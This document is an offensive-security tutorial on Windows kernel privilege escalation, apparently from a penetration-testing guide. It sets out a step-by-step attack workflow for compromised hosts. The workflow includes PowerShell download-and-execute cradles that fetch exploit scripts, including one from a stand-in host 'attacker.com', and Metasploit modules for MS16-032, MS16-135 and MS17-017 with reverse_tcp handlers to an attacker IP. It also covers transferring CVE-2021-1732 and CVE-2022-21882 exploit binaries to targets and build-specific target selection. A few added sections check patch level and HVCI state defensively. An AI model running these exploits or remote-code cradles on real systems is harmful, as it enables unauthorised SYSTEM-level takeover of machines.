Kernel-level privilege escalation
Understanding Kernel Exploitation
What Makes Kernel Exploits Viable
Kernel-level privilege escalation exploits vulnerabilities in the Windows kernel to gain SYSTEM privileges. These exploits target the core operating system rather than user-mode applications or misconfigurations.
Why Kernel Exploits Work:
Direct privilege elevation - Bypass user-mode security boundaries
System-level access - Complete control over the operating system
Token manipulation - Modify process tokens at kernel level
Bypass most protections - Operate below user-mode security mechanisms
Modern Reality: Kernel exploitation success has dramatically decreased due to modern mitigations like SMEP/SMAP, Kernel CFG, HVCI, and PatchGuard. Most attempts result in system crashes rather than clean escalation.
Automated Vulnerability Assessment
Windows Exploit Suggester
Setup and Execution:
# Download and set up Windows Exploit Suggester
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
# Update the exploit database (downloads the Microsoft security bulletin spreadsheet;
# Microsoft stopped publishing that spreadsheet in 2017, so later patches are not covered)
python windows-exploit-suggester.py --update
# On the target system, generate systeminfo output
systeminfo > systeminfo.txt
# Transfer systeminfo.txt to the attacker machine and analyze it
python windows-exploit-suggester.py --database 2023-01-01-mssb.xls --systeminfo systeminfo.txt --ostext "windows 10" --patches KB4013081
Output Analysis:
# Example output showing potential kernel exploits:
# [E] MS16-032: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Secondary Logon Handle
# [E] MS16-135: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Win32k Elevation of Privilege
# [E] MS17-017: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - GDI Palette Objects Local Privilege Escalation
Sherlock PowerShell Enumeration
Automated Kernel Vulnerability Detection:
# Download and execute Sherlock
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
# Run comprehensive vulnerability check
Find-AllVulns
# Target specific kernel vulnerabilities
Find-MS16032
Find-MS16135
Find-MS17017
Find-CVE20177199
PowerUp Integration:
# Use PowerUp for additional kernel checks
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
# Check for kernel-related misconfigurations
Invoke-AllChecks | Where-Object {$_ -match "kernel|driver"}   # -match uses .NET regex, so the pipe is unescaped
Metasploit Local Exploit Suggester
Automated Exploit Enumeration:
# Use Metasploit's local exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run
# Filter for kernel exploits specifically
use post/multi/recon/local_exploit_suggester
set SESSION 1
set KEYWORD kernel
run
Tool-Based Kernel Exploitation
MS16-032 (Secondary Logon Handle)
PowerShell Implementation:
# Download and execute MS16-032 PowerShell exploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1')
# Execute with default command
Invoke-MS16032
# Execute with custom command
Invoke-MS16032 -Command "powershell -ep bypass"
Metasploit Module:
# Use MS16-032 Metasploit module
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST attacker_ip
set LPORT 4445
run
Empire Framework:
# Use Empire's MS16-032 module
(Empire) > usemodule privesc/ms16032
(Empire: powershell/privesc/ms16032) > execute
MS16-135 (Win32k Elevation)
Metasploit Exploitation:
# MS16-135 Win32k exploit
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
set LHOST attacker_ip
set LPORT 4446
run
PowerShell Version:
# Download MS16-135 PowerShell implementation
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-135.ps1')
# Execute the exploit
Invoke-MS16-135   # the function defined in Invoke-MS16-135.ps1 keeps the hyphen in its name
CVE-2021-1732 (Win32k Elevation)
Public Exploit Tools:
# Download CVE-2021-1732 exploit
git clone https://github.com/KaLendsi/CVE-2021-1732.git
cd CVE-2021-1732
# Transfer compiled executable to target
# Execute on target system
CVE-2021-1732.exe
PowerShell Wrapper:
# PowerShell implementation of CVE-2021-1732
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/CVE-2021-1732.ps1')
Invoke-CVE20211732
CVE-2022-21882 (Win32k Elevation)
Executable Exploit:
# Download CVE-2022-21882 from GitHub
git clone https://github.com/KaLendsi/CVE-2022-21882.git
# Transfer to target and execute
CVE-2022-21882.exe cmd.exe
Metasploit Integration:
# Check if Metasploit has module for CVE-2022-21882
search CVE-2022-21882
search 2022 win32k
# Use if available
use exploit/windows/local/cve_2022_21882_win32k
set SESSION 1
run
Framework Integration
Metasploit Kernel Exploit Workflow
Comprehensive Kernel Testing:
# Step 1: Get initial session
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j
# Step 2: Run exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Step 3: Try suggested kernel exploits in order
# MS16-032
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
# MS16-135 if MS16-032 fails
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
run
# MS17-017 if others fail
use exploit/windows/local/ms17_017_gdi_palette_escalation
set SESSION 1
run
Automated Target Assessment
System Information Gathering
Rapid Assessment Tools:
# SystemInfo analysis script
function Get-KernelVulnInfo {
    $os = Get-WmiObject -Class Win32_OperatingSystem
    $build = $os.BuildNumber
    $version = $os.Version
    Write-Host "OS: $($os.Caption)"
    Write-Host "Build: $build"
    Write-Host "Version: $version"
    # Check for known vulnerable builds (build number -> issues to investigate)
    $vulnerableBuilds = @{
        "10240" = @("MS16-032", "MS16-135")
        "10586" = @("MS16-032", "MS16-135")
        "14393" = @("MS16-135", "MS17-017")
        "15063" = @("CVE-2017-7199")
        "17134" = @("CVE-2018-8120")
        "17763" = @("CVE-2019-0803")
        "18362" = @("CVE-2020-1054")
        "19041" = @("CVE-2021-1732")
        "19042" = @("CVE-2021-1732", "CVE-2022-21882")
    }
    # BuildNumber is a string, matching the string keys above
    if ($vulnerableBuilds.ContainsKey($build)) {
        Write-Host "Potentially vulnerable to: $($vulnerableBuilds[$build] -join ', ')" -ForegroundColor Red
    } else {
        Write-Host "No known kernel exploits for this build" -ForegroundColor Green
    }
}
Get-KernelVulnInfo
Patch Analysis:
# Check for critical kernel patches
$kernelPatches = @(
    "KB3139914", # MS16-032
    "KB3124280", # MS16-135
    "KB4013081", # MS17-017
    "KB4499175", # CVE-2019-0803
    "KB5000802", # CVE-2021-1732
    "KB5010793"  # CVE-2022-21882
)
foreach ($patch in $kernelPatches) {
    # Get-HotFix throws on an unknown id, so suppress the error and test for $null
    $installed = Get-HotFix -Id $patch -ErrorAction SilentlyContinue
    if ($installed) {
        Write-Host "$patch is installed - $($installed.Description)" -ForegroundColor Green
    } else {
        Write-Host "$patch is NOT installed - System may be vulnerable" -ForegroundColor Red
    }
}
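Windows 10 servicing is cumulative, so a specific KB from the list above is often absent from Get-HotFix even though its fix is present. The build.revision pair (CurrentBuildNumber plus UBR, what winver displays) increases with every cumulative update and is the more reliable patch-level indicator. The following is an added example, not code from the original page; the revision table in it is a constructed placeholder and the real minimum revision for a given fix must be looked up in the Microsoft Update Catalog or Security Update Guide.

```powershell
# Added example: compare the running build revision (UBR) against a minimum fixed
# revision instead of testing for the presence of one KB.
function Get-OSBuildRevision {
    $cv = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    # UBR only exists on Windows 10 and later; [int]$null becomes 0 on older hosts
    [pscustomobject]@{
        Build    = [int]$cv.CurrentBuildNumber
        Revision = [int]$cv.UBR
        Display  = "$($cv.CurrentBuildNumber).$($cv.UBR)"
    }
}

function Test-BuildPatched {
    param(
        [Parameter(Mandatory)][int]$Build,
        [Parameter(Mandatory)][int]$Revision,
        # build number -> lowest revision that already contains the fix
        [Parameter(Mandatory)][hashtable]$FixedRevisions
    )
    if (-not $FixedRevisions.ContainsKey($Build)) {
        return 'unknown'      # build not in the table: do not assume either way
    }
    if ($Revision -ge $FixedRevisions[$Build]) { return 'patched' }
    return 'unpatched'
}

# Constructed demonstration table (NOT real fix revisions) used for the three cases below
$demoTable = @{ 19042 = 1400; 19041 = 1400 }
Test-BuildPatched -Build 19042 -Revision 1200 -FixedRevisions $demoTable   # revision below the required 1400
Test-BuildPatched -Build 19042 -Revision 1466 -FixedRevisions $demoTable   # revision at or above 1400
Test-BuildPatched -Build 17763 -Revision 9999 -FixedRevisions $demoTable   # build absent from the table

# Live check of the current host against the same placeholder table
$os = Get-OSBuildRevision
Write-Host "Running $($os.Display): $(Test-BuildPatched -Build $os.Build -Revision $os.Revision -FixedRevisions $demoTable)"
```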
Mitigation Detection
Modern Security Feature Check:
# Check for modern kernel mitigations
function Test-KernelMitigations {
    # Check for HVCI/VBS (this registry value reflects configured policy, not whether VBS is actually running)
    $hvci = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -ErrorAction SilentlyContinue
    if ($hvci -and $hvci.EnableVirtualizationBasedSecurity -eq 1) {
        Write-Host "HVCI/VBS is enabled - Kernel exploits very unlikely to work" -ForegroundColor Red
    }
    # Check for Hypervisor (bcdedit needs an elevated prompt; "Auto" means Hyper-V launches at boot,
    # which is a prerequisite for VBS but does not by itself prove HVCI is on)
    $hyperv = bcdedit /enum | Select-String "hypervisorlaunchtype"
    if ($hyperv -match "Auto") {
        Write-Host "Hypervisor protection active" -ForegroundColor Red
    }
    # Check Windows Defender status
    $defender = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($defender -and $defender.RealTimeProtectionEnabled) {
        Write-Host "Windows Defender Real-time protection enabled" -ForegroundColor Yellow
    }
    # Check for CFG (MitigationOptions here holds the system-wide process mitigation policy written by
    # Set-ProcessMitigation -System; its presence is only an indirect hint, not a kernel CFG switch)
    $cfg = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" -Name "MitigationOptions" -ErrorAction SilentlyContinue
    if ($cfg) {
        Write-Host "Kernel CFG may be enabled" -ForegroundColor Yellow
    }
}
Test-KernelMitigations
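The registry check above only tells you what was configured; the Win32_DeviceGuard WMI class reports what is actually running, which is what decides whether unsigned kernel code gets blocked. This is an added example and not code from the original page; the class, its namespace and the numeric codes it returns are documented by Microsoft, and the function returns 'unavailable' where the class does not exist (hosts older than Windows 10).

```powershell
# Added example: read the running VBS/HVCI state from Win32_DeviceGuard
function Get-VbsHvciState {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    if (-not $dg) {
        # Class absent: pre-Windows 10 host or the DeviceGuard WMI provider is unavailable
        return [pscustomobject]@{ VbsStatus = 'unavailable'; HvciRunning = $false; CredGuardRunning = $false; Configured = '' }
    }
    # VirtualizationBasedSecurityStatus: 0 = disabled, 1 = enabled but not running, 2 = running
    $vbs = switch ([int]$dg.VirtualizationBasedSecurityStatus) {
        0 { 'disabled' }
        1 { 'enabled-not-running' }
        2 { 'running' }
        default { 'unknown' }
    }
    # SecurityServicesRunning / SecurityServicesConfigured: 1 = Credential Guard, 2 = HVCI (memory integrity)
    $running = @($dg.SecurityServicesRunning)
    [pscustomobject]@{
        VbsStatus        = $vbs
        HvciRunning      = ($running -contains 2)
        CredGuardRunning = ($running -contains 1)
        Configured       = (@($dg.SecurityServicesConfigured) -join ',')
    }
}

$state = Get-VbsHvciState
$state | Format-List
if ($state.HvciRunning) {
    Write-Host "HVCI is running: unsigned or tampered kernel code is blocked by the hypervisor" -ForegroundColor Green
} else {
    Write-Host "HVCI is not running: kernel code integrity relies on driver signing and PatchGuard only" -ForegroundColor Yellow
}
```

Get-ComputerInfo exposes the same data as DeviceGuardSecurityServicesRunning on Windows PowerShell 5.1, but it is much slower because it gathers the whole system inventory.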
Tool Recommendations by Target
Windows 10 Targets
Build-Specific Tool Selection:
# Windows 10 1507 (Build 10240)
# Best tools: MS16-032, MS16-135
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
# Windows 10 1903+ (Build 18362+)
# Limited options: CVE-2021-1732, CVE-2022-21882
# Check specific build numbers and patch levels first
Legacy Windows Targets
Windows 7/8.1 Exploitation:
# More kernel exploits available for legacy systems
# MS16-032, MS16-135, MS17-017 all viable
# Use exploit suggester for comprehensive analysis
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run
# Try exploits in reliability order:
# 1. MS16-032 (most reliable)
# 2. MS16-135 (good success rate)
# 3. MS17-017 (backup option)
Server Targets
Windows Server Exploitation:
# Server 2008/2012 - Many kernel exploits work
# Server 2016+ - Limited options, enhanced mitigations
# Focus on well-tested server exploits
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # Works on 2008-2016
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege # Server 2008-2016
Operational Considerations
When Kernel Exploits Are Worth Attempting
Target Assessment Criteria:
Legacy Windows versions (7, 8.1, Server 2008/2012)
Unpatched systems confirmed via exploit suggester
Missing critical security updates
No modern mitigations (HVCI/VBS disabled)
Air-gapped environments with limited patching
Risk Management
System Stability Risks:
High BSOD probability on modern systems
Service disruption if exploit fails
System reboot may be required
Mitigation Strategies:
Test on similar systems first if possible
Maintain alternative access methods
Document system state before exploitation
Have rollback plan if system becomes unstable